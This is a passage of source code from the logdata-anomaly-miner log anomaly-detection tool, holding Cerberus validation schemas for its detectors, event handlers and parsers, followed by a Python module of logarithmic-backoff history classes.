['PathExistsMatchRule', 'IPv4InRFC1918MatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value': {'type': ['boolean', 'float', 'integer', 'string'], 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 
'string', 'allowed': ['ValueListMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'value_list': {'type': 'list', 'schema': {'type': ['boolean', 'float', 'integer', 'string']}, 'required': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueRangeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'lower_limit': {'type': ['integer', 'float'], 'required': True}, 'upper_limit': {'type': ['integer', 'float'], 'required': True, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StringRegexMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'empty': False}, 'regex': {'type': 'string', 'required': True, 'empty': False}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'lower_limit': {'type': ['integer', 'float'], 'required': True, 'min': 0}, 'upper_limit': { 'type': ['integer', 'float'], 'required': True, 'min': 0, 'bigger_than_or_equal': ['lower_limit', None]}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ValueDependentModuloTimeMatchRule'], 'required': True}, 'path': {'type': 'string', 'required': True, 'nullable': True, 'empty': False}, 'seconds_modulo': {'type': 'integer', 'required': True, 'min': 1}, 'paths': {'type': 'list', 
'schema': {'type': 'string', 'empty': False}, 'required': True}, 'limit_lookup_dict': {'type': 'dict', 'valuesrules': {'type': 'list', 'schema': { 'type': ['integer', 'float'], 'min': 0}}, 'required': True}, 'default_limit': {'type': 'list', 'schema': {'type': 'integer', 'min': 0}, 'nullable': True}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['DebugMatchRule', 'DebugHistoryMatchRule'], 'required': True}, 'debug_mode': {'type': 'boolean'}, 'match_action': {'type': 'string', 'nullable': True, 'empty': False} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationDetector'], 'required': True}, 'parallel_check_count': {'type': 'integer', 'required': True, 'min': 1}, 'record_count_before_event': {'type': 'integer', 'min': 1}, 'persistence_id': {'type': 'string', 'empty': False}, 'output_logline': {'type': 'boolean'}, 'use_path_match': {'type': 'boolean'}, 'use_value_match': {'type': 'boolean'}, 'min_rule_attributes': {'type': 'integer', 'min': 1}, 'max_rule_attributes': {'type': 'integer', 'min': 1, 'bigger_than_or_equal': ['min_rule_attributes', 1]}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimeCorrelationViolationDetector'], 'required': True}, 'ruleset': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 
'nullable': True} }, { 'type': {'type': 'string', 'allowed': ['CorrelationRule'], 'required': True}, 'rule_id': {'type': 'string', 'required': True, 'empty': False}, 'min_time_delta': {'type': 'integer', 'required': True, 'min': 1}, 'max_time_delta': {'type': 'integer', 'required': True, 'min': 1, 'bigger_than_or_equal': ['min_time_delta', None]}, 'artefact_match_parameters': {'type': 'list', 'schema': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'nullable': True}, 'max_violations': {'type': 'integer', 'min': 1} }, { 'type': {'type': 'string', 'allowed': ['EventClassSelector'], 'required': True}, 'action_id': {'type': 'string', 'required': True, 'empty': False}, 'artefact_a_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'artefact_b_rules': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TimestampsUnsortedDetector'], 'required': True}, 'exit_on_error_flag': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableCorrelationDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'disc_div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_steps_create_new_rules': {'type': 'integer', 'min': 1}, 'num_upd_until_validation': {'type': 'integer', 'min': 1}, 'num_end_learning_phase': {'type': 'integer', 'min': 1}, 'check_cor_thres': 
{'type': 'float', 'min': 0.000001, 'max': 1.0}, 'check_cor_prob_thres': {'type': 'float', 'min': 0.000001}, 'check_cor_num_thres': {'type': 'integer', 'min': 1}, 'min_values_cors_thres': {'type': 'integer', 'min': 1}, 'new_vals_alarm_thres': {'type': 'float', 'min': 0.000001}, 'num_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_homogeneity_test': {'type': 'string', 'allowed': ['Chi', 'MaxDist']}, 'alpha_chisquare_test': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'max_dist_rule_distr': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_presel_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'matchDiscDistr', 'excludeDueDistr', 'matchDiscVals', 'random']}, 'nullable': True}, 'intersect_presel_meth': {'type': 'boolean'}, 'percentage_random_cors': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_vals_sim_tresh': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'exclude_due_distr_lower_limit': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'match_disc_distr_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': ['Rel', 'WRel']}, 'nullable': True}, 'used_validate_cor_meth': {'type': 'list', 'schema': {'type': 'string', 'allowed': [ 'coverVals', 'distinctDistr']}, 'nullable': True}, 'validate_cor_cover_vals_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'validate_cor_distinct_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': 
True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['VariableTypeDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'used_gof_test': {'type': 'string', 'allowed': ['CM', 'KS']}, 'gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 's_gof_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'd_bt_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'div_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'sim_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'indicator_thres': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_init': {'type': 'integer', 'min': 1}, 'num_update': {'type': 'integer', 'min': 1}, 'num_update_unq': {'type': 'integer', 'min': 1}, 'num_s_gof_values': {'type': 'integer', 'min': 1}, 'num_s_gof_bt': {'type': 'integer', 'min': 1}, 'num_d_bt': {'type': 'integer', 'min': 1}, 'num_pause_discrete': {'type': 'integer', 'min': 0}, 'num_pause_others': {'type': 'integer', 'min': 0}, 'test_gof_int': {'type': 'boolean'}, 'num_stop_update': {'type': 'boolean'}, 'silence_output_without_confidence': {'type': 'boolean'}, 'silence_output_except_indicator': {'type': 'boolean'}, 'num_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_update_var_type_hist_ref': {'type': 'integer', 'min': 1}, 'num_var_type_considered_ind': {'type': 'integer', 'min': 1}, 'num_stat_stop_update': {'type': 'integer', 'min': 1}, 'num_updates_until_var_reduction': {'type': 'integer', 'min': 0}, 'var_reduction_thres': 
{'type': 'float'}, 'num_skipped_ind_for_weights': {'type': 'integer', 'min': 0}, 'num_ind_for_weights': {'type': 'integer', 'min': 1}, 'used_multinomial_test': {'type': 'string', 'allowed': ['Approx', 'MT', 'Chi']}, 'use_empiric_distr': {'type': 'boolean'}, 'range_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'used_range_test': {'type': 'string', 'allowed': ['MeanSD', 'EmpiricQuantiles', 'MinMax']}, 'range_threshold': {'type': 'float', 'min': 0.000001}, 'range_limits_factor': {'type': 'float', 'min': 0.000001}, 'num_reinit_range': {'type': 'integer', 'min': 0}, 'dw_alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'save_statistics': {'type': 'boolean'}, 'output_logline': {'type': 'boolean'}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathValueTimeIntervalDetector'], 'required': True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'time_period_length': {'type': 'integer', 'min': 1}, 'max_time_diff': {'type': 'integer', 'min': 1}, 'num_reduce_time_list': {'type': 'integer', 'min': 1}, 'allow_missing_values': {'type': 'boolean'}, 'output_logline': {'type': 
'boolean'}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['PathArimaDetector'], 'required': True}, 'event_type_detector': {'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'num_init': {'type': 'integer', 'min': 1}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 'alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'learn_mode': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['TSAArimaDetector'], 'required': True}, 'event_type_detector': 
{'type': 'string', 'required': True, 'empty': False}, 'persistence_id': {'type': 'string', 'empty': False}, 'waiting_time': {'type': 'integer', 'min': 1}, 'num_sections_waiting_time': {'type': 'integer', 'min': 1}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'output_logline': {'type': 'boolean'}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'acf_pause_interval_percentage': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_auto_pause_interval': {'type': 'boolean'}, 'acf_auto_pause_interval_num_min': {'type': 'integer', 'min': 1}, 'build_sum_over_values': {'type': 'boolean'}, 'num_periods_tsa_ini': {'type': 'integer', 'min': 2}, 'num_division_time_step': {'type': 'integer', 'min': 1}, 'alpha': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'num_min_time_history': {'type': 'integer', 'min': 1}, 'num_max_time_history': {'type': 'integer', 'min': 2}, 'num_results_bt': {'type': 'integer', 'min': 1}, 'alpha_bt': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'round_time_interval_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'acf_threshold': {'type': 'float', 'min': 0.000001, 'max': 1.0}, 'force_period_length': {'type': 'boolean'}, 'set_period_length': {'type': 'integer', 'min': 1}, 'min_log_lines_per_time_step': {'type': 'integer', 'min': 1}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'learn_mode': {'type': 'boolean'}, 'suppress': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['MinimalTransitionTimeDetector'], 'required': 
True}, 'persistence_id': {'type': 'string', 'empty': False}, 'paths': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'id_path_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'constraint_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'allow_missing_id': {'type': 'boolean'}, 'num_log_lines_solidify_matrix': {'type': 'integer', 'min': 1}, 'time_output_threshold': {'type': 'integer', 'min': 0}, 'anomaly_threshold': {'type': 'float', 'min': 0, 'max': 1.0}, 'output_logline': {'type': 'boolean'}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'stop_learning_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'stop_learning_no_anomaly_time': {'type': ['integer', 'float'], 'nullable': True, 'min': 0.000001}, 'learn_mode': {'type': 'boolean'}, 'log_resource_ignore_list': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True} }, { 'id': {'type': 'string', 'nullable': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SimpleUnparsedAtomHandler', 'VerboseUnparsedAtomHandler'], 'required': True}, 'output_event_handlers': {'type': 'list', 'schema': {'type': 'string', 'empty': False}, 'nullable': True}, 'suppress': {'type': 'boolean'} } ] } } } EventHandlerValidationSchema.py000066400000000000000000000071511500476301700407720ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'EventHandlers': { 'required': False, 'type': 'list', 'nullable': True, 'default': None, 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'forbidden': [ 'KafkaEventHandler', 'ZmqEventHandler', 
'StreamPrinterEventHandler', 'SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'score': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['ZmqEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': False}, 'url': {'type': 'string', 'empty': False}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['KafkaEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'topic': {'type': 'string', 'required': True, 'empty': False}, 'cfgfile': {'type': 'string', 'empty': False}, 'options': {'type': 'dict', 'schema': { 'id': {'type': 'string', 'empty': False}, 'type': {'type': ['string', 'list', 'integer']}}}, }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['StreamPrinterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'output_file_path': {'type': 'string', 'empty': False} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'type': {'type': 'string', 'allowed': ['SyslogWriterEventHandler'], 'required': True}, 'json': {'type': 'boolean'}, 'pretty': {'type': 'boolean'}, 'score': {'type': 'boolean'}, 'weights': {'type': 'dict', 
'nullable': True}, 'auto_weights': {'type': 'boolean'}, 'auto_weights_history_length': {'type': 'integer', 'default': 1000, 'min': 1}, 'instance_name': {'type': 'string', 'default': 'aminer', 'empty': False} } ] } } } ParserValidationSchema.py000066400000000000000000000153511500476301700376500ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/schemas/validation{ 'Parser': { 'required': True, 'type': 'list', 'schema': { 'type': 'dict', 'allow_unknown': False, 'oneof_schema': [ { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'empty': False, 'forbidden': [ 'ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', 'DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement', 'JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['ElementValueBranchModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'args': {'type': ['string', 'list'], 'schema': {'type': ['string', 'integer']}, 'required': True}, 'branch_model_dict': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'id': {'type': [ 'boolean', 'float', 'integer', 'string']}, 'model': {'type': 'string', 'empty': False}}}, 'required': True} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DecimalFloatValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': 
['none', 'zero', 'blank']}, 'exponent_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DecimalIntegerValueModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'value_sign_type': {'type': 'string', 'allowed': ['none', 'optional', 'mandatory']}, 'value_pad_type': {'type': 'string', 'allowed': ['none', 'zero', 'blank']} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_format': {'type': 'string', 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'text_locale': {'type': 'string', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1}, 'timestamp_scale': {'type': 'integer', 'min': 1}, 'time_zone': {'type': 'string', 'nullable': True} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['MultiLocaleDateTimeModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'date_formats': {'type': 'list', 'schema': {'type': 'dict', 'schema': {'format': {'type': 'list', 'schema': { 'type': 'string', 'nullable': True, 'empty': False}, 'maxlength': 3, 'minlength': 3}}}, 'required': True}, 'start_year': {'type': 'integer', 'nullable': True}, 'max_time_jump_seconds': {'type': 'integer', 'min': 1} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['DelimitedDataModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'delimiter': {'type': 'string', 'required': True, 'empty': False}, 'escape': {'type': 'string'}, 
'consume_delimiter': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'optional_key_prefix': {'type': 'string'}, 'nullable_key_prefix': {'type': 'string'}, 'allow_all_fields': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['JsonStringModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'strict': {'type': 'boolean'}, 'ignore_null': {'type': 'boolean'} }, { 'id': {'type': 'string', 'required': True, 'empty': False}, 'start': {'type': 'boolean'}, 'type': {'type': 'string', 'allowed': ['XmlModelElement'], 'required': True}, 'name': {'type': 'string', 'required': True, 'empty': False}, 'key_parser_dict': {'type': 'dict', 'required': True}, 'xml_header_expected': {'type': 'boolean'}, 'attribute_prefix': {'type': 'string', 'empty': False}, 'optional_attribute_prefix': {'type': 'string', 'empty': False}, 'empty_allowed_prefix': {'type': 'string', 'empty': False} } ] } } } logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/000077500000000000000000000000001500476301700301605ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/util/History.py000066400000000000000000000111231500476301700321710ustar00rootroot00000000000000"""This module contains multiple History classes used by the aminer. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import random
import abc
import logging
from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.input.InputInterfaces import AtomHandlerInterface


def get_log_int(max_bits: int) -> int:
    """Draw a log-distributed random integer.

    The result is the number of trailing one bits of a uniformly drawn max_bits-bit value, so it lies in the range 0 to max_bits
    (inclusive): a value k < max_bits is returned with probability 2^-(k+1), max_bits itself with probability 2^-max_bits.
    @param max_bits number of random bits to draw; 0 always yields 0.
    @return the trailing-ones count.
    """
    # random.randint is acceptable here: the value only selects which history slot is dropped by LogarithmicBackoffHistory,
    # it is never used as a secret, hence the bandit B311 exclusion.
    rand_bits = random.randint(0, (1 << max_bits) - 1)  # nosec B311
    result = 0
    while (rand_bits & 1) != 0:
        result += 1
        rand_bits >>= 1
    return result


class ObjectHistory(metaclass=abc.ABCMeta):
    """This is the superinterface of all object histories.

    The idea behind that is to use that type of history best suited for a purpose considering amount of data, possibility for
    history size limits to be reached, priorization which elements should be dropped first.
    """

    @abc.abstractmethod
    def add_object(self, new_object):
        """Add an object to this history.

        This method call may evict other objects from the history.
        @param new_object the object to record.
        """

    @abc.abstractmethod
    def get_history(self):
        """Get the whole history list.

        Make sure to clone the list before modification when influences on this object are not intended.
        @return the history list object itself, not a copy.
        """

    @abc.abstractmethod
    def clear_history(self):
        """Clean the whole history."""


class LogarithmicBackoffHistory(ObjectHistory):
    """This class keeps a history list of items with logarithmic storage characteristics.

    When adding objects, the list will be filled to the maximum size with the newest items at the end. When filled, adding a new
    element will replace with probability 1/2 the last element. With a chance of 1/4, the last element will be moved to the next
    lower position, before putting the new element at the end of the list. With a chance of 1/8, the last two elements are moved, ...
    Thus the list will in average span a time range of 2^maxItems items with growing size of holes towards the earliest element.
    """

    def __init__(self, max_items: int, initial_list: list | None = None):
        """Create the history.

        @param max_items maximum number of retained objects; must be a positive int (bool is rejected although it is an int subclass).
        @param initial_list optional list of objects to start with; only the first max_items entries are taken and the slice is a
        private copy, so the caller's list is not aliased.
        @raise TypeError when max_items is not an int.
        @raise ValueError when max_items is not positive.
        """
        if isinstance(max_items, bool) or not isinstance(max_items, int):
            msg = "The max_items variable has to be an integer."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if max_items <= 0:
            msg = "The max_items variable has to be greater than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.max_items = max_items
        if initial_list is None:
            initial_list = []
        else:
            initial_list = initial_list[:max_items]
        self.history = initial_list

    def add_object(self, new_object):
        """Add a new object to the list according to the rules described in the class docstring."""
        if len(self.history) < self.max_items:
            self.history.append(new_object)
        else:
            # move_pos is in 0..max_items-1 with probability 2^-(move_pos+1): the element move_pos positions before the end
            # is dropped, the move_pos newest elements shift one slot towards the start and new_object becomes the last element.
            # move_pos == 0 therefore simply replaces the last element.
            move_pos = get_log_int(self.max_items - 1)
            self.history = self.history[:self.max_items - move_pos - 1] + self.history[self.max_items - move_pos:] + [new_object]

    def get_history(self):
        """Get the whole history list.

        Make sure to clone the list before modification when influences on this object are not intended.
        @return the internal list; add_object may rebind it, so do not cache the reference across calls.
        """
        return self.history

    def clear_history(self):
        """Clean the whole history (in place, so references obtained via get_history see the empty list)."""
        self.history[:] = []


class VolatileLogarithmicBackoffAtomHistory(AtomHandlerInterface, LogarithmicBackoffHistory):
    """This class is a volatile filter to keep a history of log atoms.

    Example usages can be for analysis by other components or for external access via remote control interface.
    Volatile means the history lives in memory only; nothing here persists it.
    """

    def __init__(self, max_items: int):
        """Initialize the history component.

        @param max_items maximum number of atoms kept, see LogarithmicBackoffHistory.
        """
        LogarithmicBackoffHistory.__init__(self, max_items)
        AtomHandlerInterface.__init__(self)

    def receive_atom(self, log_atom) -> bool:
        """Receive an atom and add it to the history log.

        @return always True; the atom is never rejected.
        """
        self.add_object(log_atom)
        return True
